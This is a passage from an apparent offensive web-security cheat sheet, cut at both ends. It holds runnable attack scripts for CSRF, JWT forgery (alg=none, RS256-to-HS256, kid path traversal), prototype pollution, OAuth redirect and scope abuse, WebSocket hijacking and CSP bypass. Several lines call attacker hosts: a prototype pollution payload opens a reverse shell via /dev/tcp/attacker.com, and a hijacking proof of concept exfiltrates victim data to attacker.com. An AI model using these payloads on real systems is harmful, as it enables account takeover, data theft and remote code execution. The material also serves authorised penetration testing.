    # Get forms from main pages
    pages = ['/', '/profile', '/settings', '/account']
    vulnerabilities = []
    for page in pages:
        page_url = base_url + page
        try:
            r = session.get(page_url, timeout=10)
            soup = BeautifulSoup(r.text, 'html.parser')
            for form in soup.find_all('form'):
                action = form.get('action', '')
                method = form.get('method', 'GET').upper()
                # Check if form has CSRF token
                csrf_input = form.find('input', {'name': lambda x: x and 'csrf' in x.lower()})
                if method != 'POST' or csrf_input:
                    continue
                # Resolve the action against the page it came from. This
                # handles relative paths, absolute URLs and an empty action
                # (which submits to the current page).
                target = urljoin(page_url, action)
                print(f"[!] Potential CSRF: {method} {action}")
                print(f" No CSRF token found")
                vulnerabilities.append({
                    'url': target,
                    'method': method,
                    'has_csrf_token': False
                })
                # Test if request works without CSRF token
                form_data = {}
                for input_field in form.find_all('input'):
                    name = input_field.get('name')
                    if name and 'csrf' not in name.lower():
                        form_data[name] = 'test'
                test_response = session.request(
                    method,
                    target,
                    data=form_data,
                    timeout=10
                )
                # A 200/302 only shows the request was not rejected outright.
                # Confirm the state change manually.
                if test_response.status_code in [200, 201, 302]:
                    print(f"[!] CONFIRMED: Request succeeded without CSRF token")
        except Exception as e:
            print(f"[-] Error testing {page}: {e}")
    return vulnerabilities
if __name__ == "__main__":
    # CLI entry point: <base_url> [session_cookie]
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <base_url> [session_cookie]")
        sys.exit(1)
    base_url = sys.argv[1]
    session_cookie = {}
    if len(sys.argv) > 2:
        # The value is sent under the cookie name 'session'.
        session_cookie = {'session': sys.argv[2]}
    find_csrf_vulnerabilities(base_url, session_cookie)
EOF
chmod +x csrf_tester.py
JSON Web Token (JWT) Attacks#
# JWT Structure: header.payload.signature
# Example: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# Attack 1: Algorithm Confusion (alg=none)
# Decode JWT at jwt.io
# Change algorithm to "none" in header
# Remove signature (keep trailing dot)
# Header: {"alg":"none","typ":"JWT"}
# Payload: {"sub":"admin","iat":1516239022}
# Result: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTUxNjIzOTAyMn0.
# Attack 2: Algorithm Confusion (RS256 to HS256)
# If server uses RS256 (asymmetric) but accepts HS256 (symmetric)
# Sign token with HS256 using server's RSA public key
cat > jwt_rs256_to_hs256.py << 'EOF'
#!/usr/bin/env python3
import jwt
import sys
def rs256_to_hs256_attack(token, public_key_file):
    """Convert RS256 JWT to HS256 using public key as secret

    Args:
        token: Original JWT; decoded without signature verification.
        public_key_file: Path to the file whose text is used as the HMAC key.

    Returns:
        The re-signed token, with ``role`` and ``is_admin`` set in the payload.
    """
    # Decode without verification
    payload = jwt.decode(token, options={"verify_signature": False})
    # Modify payload (e.g., escalate privileges)
    payload['role'] = 'admin'
    payload['is_admin'] = True
    # Read public key
    with open(public_key_file, 'r', encoding='utf-8') as f:
        public_key = f.read()
    # Sign with HS256 using public key as secret
    # NOTE(review): recent PyJWT releases appear to reject PEM-formatted keys
    # as HMAC secrets (InvalidKeyError). Confirm against the installed version.
    malicious_token = jwt.encode(payload, public_key, algorithm='HS256')
    print(f"[+] Original token: {token}")
    print(f"[+] Malicious token: {malicious_token}")
    return malicious_token
if __name__ == "__main__":
    # CLI entry point: <jwt_token> <public_key_file>
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <jwt_token> <public_key_file>")
        sys.exit(1)
    rs256_to_hs256_attack(sys.argv[1], sys.argv[2])
EOF
chmod +x jwt_rs256_to_hs256.py
# Attack 3: Weak Secret Brute Force
# Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# Using john the ripper
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256
# Using jwt-cracker (Node.js)
npm install -g jwt-cracker
jwt-cracker "eyJ0eXAiOiJKV1QiLCJhbGc..." "abcdefghijklmnopqrstuvwxyz0123456789" 6
# Attack 4: Kid Parameter Manipulation
# If JWT header has "kid" (Key ID), try path traversal
# Original header:
# {"alg":"HS256","typ":"JWT","kid":"key1"}
# Attack headers:
{"alg":"HS256","typ":"JWT","kid":"../../dev/null"} # Empty file = empty secret
{"alg":"HS256","typ":"JWT","kid":"/dev/null"}
{"alg":"HS256","typ":"JWT","kid":"../../../proc/self/environ"}
# Sign with empty secret:
import jwt
payload = {"sub":"admin"}
token = jwt.encode(payload, "", algorithm="HS256")
# Attack 5: JKU (JWK Set URL) Header Injection
# Host malicious JWK on your server
# JWT header:
{
"alg": "RS256",
"typ": "JWT",
"jku": "https://attacker.com/jwks.json"
}
# Host jwks.json on attacker.com:
cat > jwks.json << 'EOF'
{
"keys": [
{
"kty": "RSA",
"kid": "attacker-key",
"use": "sig",
"n": "YOUR_PUBLIC_KEY_N",
"e": "AQAB"
}
]
}
EOF
# Generate your own RSA key pair
openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem
# Attack 6: X5U (X.509 URL) Header Injection
# Similar to JKU but with X.509 certificate
{
"alg": "RS256",
"typ": "JWT",
"x5u": "https://attacker.com/cert.pem"
}
# Attack 7: JWT Confusion via Multiple Algorithms
# Some libraries accept both algorithms
# Try signing with different algorithms
# OPSEC: Comprehensive JWT testing tool
cat > jwt_attacker.py << 'EOF'
#!/usr/bin/env python3
import jwt
import json
import base64
import sys
class JWTAttacker:
    """Derives tampered variants of a JWT for testing how a verifier handles them.

    The token is decoded without signature verification when the object is
    created. Each attack method builds a modified token from that header and
    payload and prints it.

    Attributes:
        token: The original encoded JWT.
        header: Unverified header dict of ``token``.
        payload: Unverified claims dict of ``token``.
    """

    def __init__(self, token):
        self.token = token
        self.header = jwt.get_unverified_header(token)
        self.payload = jwt.decode(token, options={"verify_signature": False})

    def display_info(self):
        """Display JWT information"""
        print("[*] JWT Information:")
        print(f" Header: {json.dumps(self.header, indent=6)}")
        print(f" Payload: {json.dumps(self.payload, indent=6)}")

    def none_algorithm_attack(self):
        """Generate token with alg=none

        Returns:
            ``header.payload.`` with an empty signature segment.
        """
        print("\n[*] Attack 1: None Algorithm")
        header = self.header.copy()
        header['alg'] = 'none'
        # Escalate privileges in payload
        payload = self.payload.copy()
        payload['role'] = 'admin'
        payload['is_admin'] = True
        # Encode without signature (base64url, padding stripped)
        header_b64 = base64.urlsafe_b64encode(
            json.dumps(header).encode()
        ).decode().rstrip('=')
        payload_b64 = base64.urlsafe_b64encode(
            json.dumps(payload).encode()
        ).decode().rstrip('=')
        malicious_token = f"{header_b64}.{payload_b64}."
        print(f"[+] Malicious token: {malicious_token}")
        return malicious_token

    def weak_secret_test(self, wordlist=('secret', 'password', 'key', '123456')):
        """Test common weak secrets

        Args:
            wordlist: Iterable of candidate HMAC secrets.

        Returns:
            The first secret that verifies the token's signature, else None.
        """
        print("\n[*] Attack 2: Weak Secret Testing")
        # Only the signature matters here. Claim checks are switched off so
        # that an expired token cannot hide a correct secret.
        signature_only = {
            "verify_exp": False,
            "verify_nbf": False,
            "verify_iat": False,
            "verify_aud": False,
            "verify_iss": False,
        }
        for secret in wordlist:
            try:
                jwt.decode(self.token, secret, algorithms=['HS256', 'HS512'],
                           options=signature_only)
            except jwt.InvalidTokenError:
                # Wrong secret, or the token is not HS256/HS512.
                continue
            print(f"[!] WEAK SECRET FOUND: {secret}")
            # Generate admin token
            payload = self.payload.copy()
            payload['role'] = 'admin'
            payload['is_admin'] = True
            admin_token = jwt.encode(payload, secret, algorithm='HS256')
            print(f"[+] Admin token: {admin_token}")
            return secret
        print("[-] No weak secrets found in wordlist")
        return None

    def kid_manipulation(self):
        """Test kid parameter manipulation"""
        print("\n[*] Attack 3: Kid Parameter Manipulation")
        kid_payloads = [
            "/dev/null",
            "../../dev/null",
            "../../../proc/self/environ",
            "../../../../etc/passwd"
        ]
        payload = self.payload.copy()
        payload['role'] = 'admin'
        for kid in kid_payloads:
            header = self.header.copy()
            header['kid'] = kid
            # Pin the header algorithm so an inherited value (e.g. RS256)
            # cannot take precedence over the HS256 signing below.
            header['alg'] = 'HS256'
            # Try signing with empty secret (for /dev/null)
            try:
                token = jwt.encode(payload, "", algorithm="HS256", headers=header)
            except Exception as e:
                print(f"[-] Could not build token with kid={kid}: {e}")
                continue
            print(f"[+] Token with kid={kid}:")
            print(f" {token}")

    def generate_report(self):
        """Generate full attack report"""
        print("\n" + "="*60)
        print("JWT ATTACK REPORT")
        print("="*60)
        self.display_info()
        self.none_algorithm_attack()
        self.weak_secret_test()
        self.kid_manipulation()
        print("\n[*] Manual testing recommendations:")
        print(" 1. Test token with modified payload")
        print(" 2. Try RS256→HS256 confusion if public key available")
        print(" 3. Brute force secret with hashcat/john")
        print(" 4. Test JKU/X5U header injection if headers present")
if __name__ == "__main__":
    # Script entry point: the JWT to analyse is the only required argument.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <jwt_token>")
        sys.exit(1)
    attacker = JWTAttacker(sys.argv[1])
    attacker.generate_report()
EOF
chmod +x jwt_attacker.py
python3 jwt_attacker.py "eyJ0eXAiOiJKV1QiLCJhbGc..."
Prototype Pollution (JavaScript/Node.js)#
// Prototype Pollution - Critical in Node.js applications
// Detection payload (basic)
{"__proto__": {"polluted": "yes"}}
// After sending, check if pollution worked:
// In Node.js console or via API response:
// console.log({}.polluted) // Should return "yes" if vulnerable
// Attack 1: Property Injection
{
"__proto__": {
"isAdmin": true,
"role": "admin"
}
}
// Attack 2: XSS via Prototype Pollution
{
"__proto__": {
"innerHTML": "<img src=x onerror=alert(1)>"
}
}
// Attack 3: DoS via Prototype Pollution
{
"__proto__": {
"toString": null
}
}
// This breaks toString() for all objects
// Attack 4: RCE via Prototype Pollution (Node.js)
// Pollute process environment variables
{
"__proto__": {
"env": {
"NODE_OPTIONS": "--require /tmp/malicious.js"
}
}
}
// Attack 5: Command Injection via child_process
{
"__proto__": {
"shell": "/bin/bash",
"argv0": "bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"
}
}
// OPSEC: Automated Prototype Pollution testing
cat > prototype_pollution_test.js << 'EOF'
const axios = require('axios');
// POST each prototype-pollution probe to `url`, then GET `url + '/check'`
// and report when a probe property shows up in that response.
async function testPrototypePollution(url) {
  console.log('[*] Testing for Prototype Pollution');

  // Test payloads, kept as raw JSON text on purpose. Written as object
  // literals, a `"__proto__": {...}` key sets the literal's prototype instead
  // of creating an own property, so JSON.stringify() would serialise the
  // probe as `{}` and the server would never see the `__proto__` key.
  const payloads = [
    '{"__proto__":{"polluted":"test1"}}',
    '{"constructor":{"prototype":{"polluted":"test2"}}}',
    '{"__proto__":{"isAdmin":true}}',
    '{"__proto__":{"role":"admin"}}'
  ];

  for (const payload of payloads) {
    try {
      console.log(`\n[*] Testing payload: ${payload}`);
      // The body is already a JSON string; it is sent as-is.
      const response = await axios.post(url, payload, {
        headers: { 'Content-Type': 'application/json' }
      });
      console.log(`[+] Status: ${response.status}`);

      // Check if pollution occurred (send second request)
      const checkResponse = await axios.get(url + '/check');
      // Guard against an empty/null body so the property reads cannot throw.
      const data = checkResponse.data || {};
      if (data.polluted || data.isAdmin || data.role === 'admin') {
        console.log('[!] VULNERABLE: Prototype Pollution detected!');
        console.log(`[!] Polluted properties: ${JSON.stringify(data)}`);
      }
    } catch (error) {
      console.log(`[-] Error: ${error.message}`);
    }
  }
}

// Usage
const targetUrl = process.argv[2] || 'http://target.com/api/merge';
testPrototypePollution(targetUrl);
EOF
# Alternative Python version
cat > prototype_pollution_test.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
def test_prototype_pollution(url, timeout=10):
    """Test for prototype pollution vulnerabilities

    POSTs each probe payload to *url* as JSON, then GETs ``url + '/check'``
    and reports when a probe property appears in that response.

    Args:
        url: endpoint that accepts the JSON payloads.
        timeout: per-request timeout in seconds. Requests has no default
            timeout, so without one an unresponsive target hangs the script.
    """
    print("[*] Testing for Prototype Pollution")
    payloads = [
        {"__proto__": {"polluted": "test"}},
        {"__proto__": {"isAdmin": True}},
        {"__proto__": {"role": "admin"}},
        {"constructor": {"prototype": {"polluted": "test"}}},
        {"__proto__": {"toString": "polluted"}},
    ]
    headers = {'Content-Type': 'application/json'}
    for payload in payloads:
        print(f"\n[*] Testing payload: {json.dumps(payload)}")
        try:
            # Send pollution payload
            r = requests.post(url, json=payload, headers=headers, timeout=timeout)
            print(f"[+] Status: {r.status_code}")
            # Check if pollution worked
            check = requests.get(url + '/check', timeout=timeout)
            response_json = check.json() if check.status_code == 200 else {}
            # The check endpoint may return a JSON list or scalar; only a
            # dict supports the keyed lookups below.
            fields = response_json if isinstance(response_json, dict) else {}
            if (
                'polluted' in str(response_json)
                or fields.get('isAdmin')
                or fields.get('role') == 'admin'
            ):
                print("[!] VULNERABLE: Prototype Pollution detected!")
                print(f"[!] Response: {json.dumps(response_json, indent=2)}")
        except Exception as e:
            # Best-effort scan: report the failure and move on to the next payload.
            print(f"[-] Error: {e}")
if __name__ == "__main__":
    # Script entry point: the target URL is the only required argument.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    test_prototype_pollution(sys.argv[1])
EOF
chmod +x prototype_pollution_test.py
python3 prototype_pollution_test.py http://target.com/api/merge
OAuth 2.0 / OpenID Connect Attacks#
# OAuth 2.0 Attack Vectors
# Attack 1: Redirect URI Manipulation
# Original: redirect_uri=https://client.com/callback
# Attacks:
redirect_uri=https://attacker.com/callback
redirect_uri=https://client.com.attacker.com/callback
redirect_uri=https://client.com@attacker.com/callback
redirect_uri=https://client.com#attacker.com
redirect_uri=https://client.com.evil.com
# Open redirect chaining:
redirect_uri=https://client.com/redirect?url=https://attacker.com
# Attack 2: State Parameter Bypass (CSRF)
# If state parameter missing or not validated:
# Step 1: Attacker initiates OAuth flow
https://oauth-provider.com/authorize?client_id=CLIENT&redirect_uri=https://client.com/callback&scope=read
# Step 2: Attacker gets authorization code but doesn't complete
# Step 3: Victim clicks attacker's link with attacker's code
https://client.com/callback?code=ATTACKER_CODE
# Step 4: Victim's account linked to attacker's OAuth account
# Attack 3: Scope Escalation
# Original: scope=read:profile
# Attacks:
scope=read:profile write:profile admin:all
scope=*
scope=read:profile,admin:all
# Attack 4: Client Secret Exposure
# Search for exposed secrets in:
# - JavaScript files
# - Mobile app decompilation
# - GitHub repositories
# - Environment variable leaks
# Common locations:
grep -r "client_secret" /path/to/app/
grep -r "oauth" /path/to/app/ | grep -i "secret"
# Attack 5: Authorization Code Interception
# If redirect_uri uses HTTP instead of HTTPS:
redirect_uri=http://client.com/callback # Intercept via MITM
# Attack 6: Implicit Flow Token Theft (deprecated but still used)
# Tokens in URL fragments can be stolen via:
# - Referer headers
# - Browser history
# - Open redirects
# Example: Force open redirect after OAuth
https://oauth-provider.com/authorize?...&redirect_uri=https://client.com/redirect?next=https://attacker.com
# OPSEC: OAuth vulnerability scanner
cat > oauth_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
from urllib.parse import urlparse, parse_qs, urlencode
import sys
def test_oauth_vulnerabilities(auth_url, timeout=5):
    """Test OAuth 2.0 implementation for vulnerabilities

    Re-issues the authorization request in *auth_url* with modified
    ``redirect_uri`` and ``scope`` values, inspects the original parameters,
    prints a report, and returns the findings.

    Args:
        auth_url: full authorization URL, including its query string.
        timeout: per-request timeout in seconds.

    Returns:
        A list of dicts, each with a ``type`` key plus finding-specific keys.
    """
    print(f"[*] Testing OAuth endpoint: {auth_url}")
    parsed = urlparse(auth_url)
    params = parse_qs(parsed.query)
    vulnerabilities = []
    redirect_statuses = (301, 302, 303, 307, 308)

    def build_url(overrides):
        """Return the authorization URL with *overrides* applied to its query."""
        test_params = params.copy()
        test_params.update(overrides)
        return f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"

    # Test 1: Redirect URI manipulation
    print("\n[*] Test 1: Redirect URI Manipulation")
    redirect_tests = [
        'https://attacker.com',
        'https://evil.com',
        'http://localhost',
        'https://client.com.evil.com',
    ]
    for redirect in redirect_tests:
        try:
            r = requests.get(
                build_url({'redirect_uri': [redirect]}),
                allow_redirects=False,
                timeout=timeout,
            )
        except requests.RequestException as e:
            print(f"[-] Request failed for redirect_uri={redirect}: {e}")
            continue
        location = r.headers.get('Location', '')
        # The provider must actually redirect *to* the supplied URI. A
        # substring match would also fire when the rejected URI is merely
        # echoed inside an error-page URL.
        if r.status_code in redirect_statuses and location.startswith(redirect):
            print(f"[!] VULNERABLE: Redirect accepted to {redirect}")
            vulnerabilities.append({
                'type': 'open_redirect',
                'redirect_uri': redirect
            })

    # Test 2: Check if state parameter present
    print("\n[*] Test 2: State Parameter Check")
    if 'state' not in params or not params['state']:
        print("[!] WARNING: State parameter missing (CSRF vulnerable)")
        vulnerabilities.append({
            'type': 'missing_state',
            'description': 'No CSRF protection via state parameter'
        })
    else:
        print("[+] State parameter present")

    # Test 3: Scope escalation
    print("\n[*] Test 3: Scope Escalation")
    scope_tests = [
        'admin',
        'admin:all',
        '*',
        'read write admin'
    ]
    for scope in scope_tests:
        try:
            r = requests.get(
                build_url({'scope': [scope]}),
                allow_redirects=False,
                timeout=timeout,
            )
        except requests.RequestException as e:
            print(f"[-] Request failed for scope '{scope}': {e}")
            continue
        # Providers commonly reject a request by redirecting back with an
        # "error" parameter (e.g. error=invalid_scope); that is not acceptance.
        if r.status_code == 302 and 'error=' in r.headers.get('Location', ''):
            print(f"[-] Scope '{scope}' rejected by provider")
            continue
        if r.status_code in [200, 302]:
            print(f"[+] Scope '{scope}' accepted (Status: {r.status_code})")
            vulnerabilities.append({
                'type': 'scope_escalation',
                'scope': scope,
                'description': 'Request was not rejected; confirm the scope is actually granted'
            })

    # Test 4: Check for HTTP redirect_uri
    print("\n[*] Test 4: HTTP Redirect URI (Insecure)")
    if 'redirect_uri' in params:
        redirect_uri = params['redirect_uri'][0]
        if redirect_uri.startswith('http://'):
            print(f"[!] CRITICAL: Redirect URI uses HTTP: {redirect_uri}")
            vulnerabilities.append({
                'type': 'http_redirect_uri',
                'uri': redirect_uri
            })

    # Generate report
    print("\n" + "="*60)
    print("OAUTH VULNERABILITY REPORT")
    print("="*60)
    if vulnerabilities:
        print(f"\n[!] Found {len(vulnerabilities)} vulnerabilities:\n")
        for i, vuln in enumerate(vulnerabilities, 1):
            print(f"{i}. {vuln['type'].upper()}")
            for key, value in vuln.items():
                if key != 'type':
                    print(f" {key}: {value}")
            print()
    else:
        print("\n[+] No obvious vulnerabilities detected")
    return vulnerabilities
if __name__ == "__main__":
    # Script entry point: the authorization URL is the only required argument.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <oauth_authorization_url>")
        print(f"Example: {sys.argv[0]} 'https://oauth.com/authorize?client_id=123&redirect_uri=...'")
        sys.exit(1)
    test_oauth_vulnerabilities(sys.argv[1])
EOF
chmod +x oauth_scanner.py
WebSocket Security#
// WebSocket Attack Vectors
// Attack 1: WebSocket Connection Hijacking
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
console.log('[+] WebSocket connected');
// Send malicious payloads
ws.send('{"type":"admin","command":"delete_user","user_id":"victim"}');
ws.send('{"action":"transfer","amount":1000,"to":"attacker"}');
};
ws.onmessage = function(event) {
console.log('[+] Received:', event.data);
};
// Attack 2: CSWSH (Cross-Site WebSocket Hijacking)
// Similar to CSRF but for WebSocket connections
cat > cswsh_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSWSH PoC</title>
</head>
<body>
<h1>Cross-Site WebSocket Hijacking</h1>
<div id="output"></div>
<script>
// Exploit WebSocket that relies on cookies for authentication
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
console.log('[+] WebSocket hijacked!');
document.getElementById('output').innerHTML += '<p>Connected to target WebSocket</p>';
// Send malicious commands
ws.send(JSON.stringify({
action: 'get_messages',
user_id: 'victim'
}));
ws.send(JSON.stringify({
action: 'transfer_funds',
amount: 1000,
to: 'attacker'
}));
};
ws.onmessage = function(event) {
console.log('[+] Data received:', event.data);
// Exfiltrate data
fetch('https://attacker.com/exfil', {
method: 'POST',
body: event.data
});
document.getElementById('output').innerHTML +=
'<p>Received: ' + event.data + '</p>';
};
ws.onerror = function(error) {
console.log('[-] Error:', error);
};
</script>
</body>
</html>
EOF
// Attack 3: WebSocket Message Manipulation
// Intercept and modify WebSocket messages using Burp Suite
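// Attack 4: WebSocket Smuggling / Malformed Message Fuzzing
// Send oversized or malformed messages to probe frame-size limits and parser error handling
// (strictly, "WebSocket smuggling" refers to abusing a reverse proxy's handling of a failed Upgrade handshake; the payloads below are input fuzzing)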
ws.send('A'.repeat(1000000)); // Large payload
ws.send('\x00\x00\x00'); // Null bytes
ws.send('{"incomplete":'); // Malformed JSON
// Attack 5: WebSocket Denial of Service
// Rapid connection/disconnection
for(let i = 0; i < 1000; i++) {
let ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
ws.close();
};
}
// OPSEC: WebSocket security testing tool
cat > websocket_tester.py << 'EOF'
#!/usr/bin/env python3
import asyncio
import websockets
import json
import sys
async def test_websocket_security(uri):
    """Test WebSocket endpoint for security issues

    Opens one connection to *uri* and, over it, sends unauthenticated
    requests, injection-style messages and a 1 MB message, printing what the
    server answers. Any failure outside the large-payload test is reported as
    a connection error and ends the run.
    """
    print(f"[*] Testing WebSocket: {uri}")

    def as_text(message):
        """Return a received frame as str (binary frames are decoded leniently)."""
        # Binary frames arrive as bytes; string checks such as
        # `'error' not in message.lower()` would raise TypeError on them.
        if isinstance(message, (bytes, bytearray)):
            return bytes(message).decode('utf-8', errors='replace')
        return message

    try:
        # Test 1: Basic connection
        print("\n[*] Test 1: Connection Test")
        async with websockets.connect(uri) as ws:
            print("[+] Successfully connected")

            # Test 2: Authentication bypass
            print("\n[*] Test 2: Authentication Bypass")
            auth_payloads = [
                {"action": "authenticate", "token": "invalid"},
                {"action": "authenticate", "user_id": "admin"},
                {"action": "get_user_data", "user_id": 1},
                {"action": "get_user_data", "user_id": "admin"}
            ]
            for payload in auth_payloads:
                await ws.send(json.dumps(payload))
                try:
                    response = as_text(await asyncio.wait_for(ws.recv(), timeout=2.0))
                    print(f"[+] Payload: {payload}")
                    print(f" Response: {response[:100]}")
                except asyncio.TimeoutError:
                    print(f"[-] Timeout for payload: {payload}")

            # Test 3: Message injection
            print("\n[*] Test 3: Command Injection")
            injection_payloads = [
                {"command": "delete_user", "user_id": "victim"},
                {"action": "admin_command", "cmd": "shutdown"},
                {"type": "sql", "query": "' OR 1=1--"},
                {"action": "xss", "data": "<script>alert(1)</script>"}
            ]
            for payload in injection_payloads:
                await ws.send(json.dumps(payload))
                try:
                    response = as_text(await asyncio.wait_for(ws.recv(), timeout=2.0))
                    if 'error' not in response.lower():
                        print(f"[!] Potential vulnerability with: {payload}")
                        print(f" Response: {response[:100]}")
                except asyncio.TimeoutError:
                    pass

            # Test 4: Large payload (DoS)
            print("\n[*] Test 4: Large Payload Test")
            large_payload = "A" * 1000000
            try:
                await ws.send(large_payload)
                print("[+] Large payload sent (1MB)")
                response = await asyncio.wait_for(ws.recv(), timeout=5.0)
                print(f"[+] Server handled large payload: {len(response)} bytes")
            except Exception as e:
                print(f"[!] Large payload caused error: {e}")
    except Exception as e:
        print(f"[-] Connection error: {e}")
if __name__ == "__main__":
    # Script entry point: the WebSocket URI is the only required argument.
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <websocket_uri>")
        print(f"Example: {sys.argv[0]} wss://target.com/ws")
        sys.exit(1)
    asyncio.run(test_websocket_security(sys.argv[1]))
EOF
chmod +x websocket_tester.py
Content Security Policy (CSP) Bypasses#
<!-- CSP Bypass Techniques -->
<!-- Bypass 1: JSONP Endpoint Abuse (if whitelisted domain has JSONP) -->
<script src="https://trusted-site.com/jsonp?callback=alert"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert"></script>
<script src="https://www.google.com/complete/search?client=chrome&jsonp=alert"></script>
<!-- Bypass 2: Open Redirect on Whitelisted Domain -->
<script src="https://trusted-site.com/redirect?url=https://evil.com/xss.js"></script>
<!-- Bypass 3: Base Tag Injection (if base-uri not restricted) -->
<base href="https://evil.com/">
<script src="/malicious.js"></script>
<!-- Bypass 4: Dangling Markup (if unsafe-inline blocked but quotes not encoded) -->
<img src='https://attacker.com/collect?html=
<!-- Everything after this is sent as query parameter -->
<!-- Bypass 5: AngularJS Sandbox Bypass (if Angular loaded) -->
{{constructor.constructor('alert(1)')()}}
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
{{$on.constructor('alert(1)')()}}
<!-- AngularJS 1.6+ (the expression sandbox was removed in 1.6, so no sandbox escape is needed) -->
{{[].pop.constructor('alert(1)')()}}
<!-- Bypass 6: Script Gadgets (if popular libraries loaded) -->
<!-- jQuery CSP bypass -->
<div data-src="xss"><script src="jquery.js"></script></div>
<!-- Prototype.js CSP bypass -->
<form action="javascript:alert(1)"><button>Click</button></form>
<!-- Bypass 7: Nonce Prediction/Reuse -->
<!-- If CSP uses nonce but nonce is predictable or reusable -->
<script nonce="PREDICTED_NONCE">alert(1)</script>
<!-- Bypass 8: 'strict-dynamic' Misuse -->
<!-- If script with valid nonce loads attacker-controlled script -->
<script nonce="VALID_NONCE">
var s = document.createElement('script');
s.src = 'https://evil.com/xss.js';
document.body.appendChild(s); // Allowed due to strict-dynamic
</script>
<!-- Bypass 9: RPO (Relative Path Overwrite) -->
<!-- If CSP allows 'self' and path-relative stylesheets exist -->
http://site.com/page/..%2fstyle.css%0a<script>alert(1)</script>
<!-- Bypass 10: Service Worker CSP Bypass -->
<script>
if ('serviceWorker' in navigator) {
navigator.serviceWorker.register('/sw.js').then(() => {
// Service Worker can modify CSP headers of subsequent requests
});
}
</script>
<!-- Bypass 11: Iframe Injection (if frame-src not restricted) -->
<iframe src="javascript:alert(document.domain)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<!-- Bypass 12: Object/Embed Tag Abuse -->
<object data="data:text/html,<script>alert(1)</script>"></object>
<embed src="data:text/html,<script>alert(1)</script>">
<!-- OPSEC: CSP bypass testing script -->
cat > csp_bypass_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
def test_csp_bypasses(url):
    """Test for CSP bypass vulnerabilities

    Fetches *url*, parses its ``Content-Security-Policy`` header into
    directives, reports script-related misconfigurations, checks a few query
    parameters for reflection, and prints matching bypass suggestions.
    Returns None; all output is printed.
    """
    print(f"[*] Testing CSP on {url}")
    try:
        r = requests.get(url, timeout=5)
        csp = r.headers.get('Content-Security-Policy', '')
        if not csp:
            print("[!] WARNING: No CSP header found")
            return
        print(f"[*] CSP Policy: {csp}")
        print()

        # Parse the policy into {directive: [sources]}. Substring checks on
        # the raw header would blame script handling for e.g. `img-src *` or
        # `style-src 'unsafe-inline'`. The first occurrence of a directive wins.
        directives = {}
        for part in csp.split(';'):
            tokens = part.lower().split()
            if tokens:
                directives.setdefault(tokens[0], tokens[1:])
        # Scripts are governed by script-src, falling back to default-src.
        script_sources = directives.get('script-src', directives.get('default-src', []))

        # Check for common misconfigurations
        issues = []
        # Check 1: unsafe-inline
        if "'unsafe-inline'" in script_sources:
            print("[!] ISSUE: 'unsafe-inline' detected (allows inline scripts)")
            issues.append('unsafe-inline')
        # Check 2: unsafe-eval
        if "'unsafe-eval'" in script_sources:
            print("[!] ISSUE: 'unsafe-eval' detected (allows eval())")
            issues.append('unsafe-eval')
        # Check 3: Wildcard sources
        if any('*' in source for source in script_sources):
            print("[!] ISSUE: Wildcard in script-src")
            issues.append('wildcard-script-src')
        # Check 4: data: URI
        if 'data:' in script_sources:
            print("[!] ISSUE: 'data:' URI allowed")
            issues.append('data-uri')
        # Check 5: Missing base-uri
        if 'base-uri' not in directives:
            print("[!] ISSUE: 'base-uri' not defined (base tag injection possible)")
            issues.append('missing-base-uri')
        # Check 6: Check for known JSONP endpoints in whitelist
        jsonp_domains = [
            'google.com',
            'googleapis.com',
            'gstatic.com',
            'accounts.google.com'
        ]
        for domain in jsonp_domains:
            if any(domain in source for source in script_sources):
                print(f"[!] ISSUE: Whitelisted domain with JSONP: {domain}")
                issues.append(f'jsonp-{domain}')
        # Check 7: Nonce without strict-dynamic
        uses_nonce = any(source.startswith("'nonce-") for source in script_sources)
        if uses_nonce and "'strict-dynamic'" not in script_sources:
            print("[!] INFO: Nonce used without strict-dynamic (potential bypass)")

        # Check for reflected content
        print("\n[*] Checking for reflected parameters...")
        test_params = {
            'q': '<script>alert(1)</script>',
            'search': '<img src=x onerror=alert(1)>',
            'callback': 'alert'
        }
        for param, payload in test_params.items():
            # Let requests build the query string so a URL that already has
            # one is extended rather than corrupted by a second "?".
            r_test = requests.get(url, params={param: payload}, timeout=5)
            if payload in r_test.text:
                print(f"[!] Parameter '{param}' reflected (potential CSP bypass if inline blocked)")

        # Generate bypass recommendations
        print("\n" + "="*60)
        print("CSP BYPASS RECOMMENDATIONS")
        print("="*60)
        if 'unsafe-inline' in issues:
            print("\n1. Direct inline script injection")
            print(" <script>alert(1)</script>")
        if 'data-uri' in issues:
            print("\n2. Data URI bypass")
            print(' <script src="data:text/javascript,alert(1)"></script>')
        if 'missing-base-uri' in issues:
            print("\n3. Base tag injection")
            print(' <base href="https://evil.com/">')
        if any('jsonp' in i for i in issues):
            print("\n4. JSONP endpoint abuse")
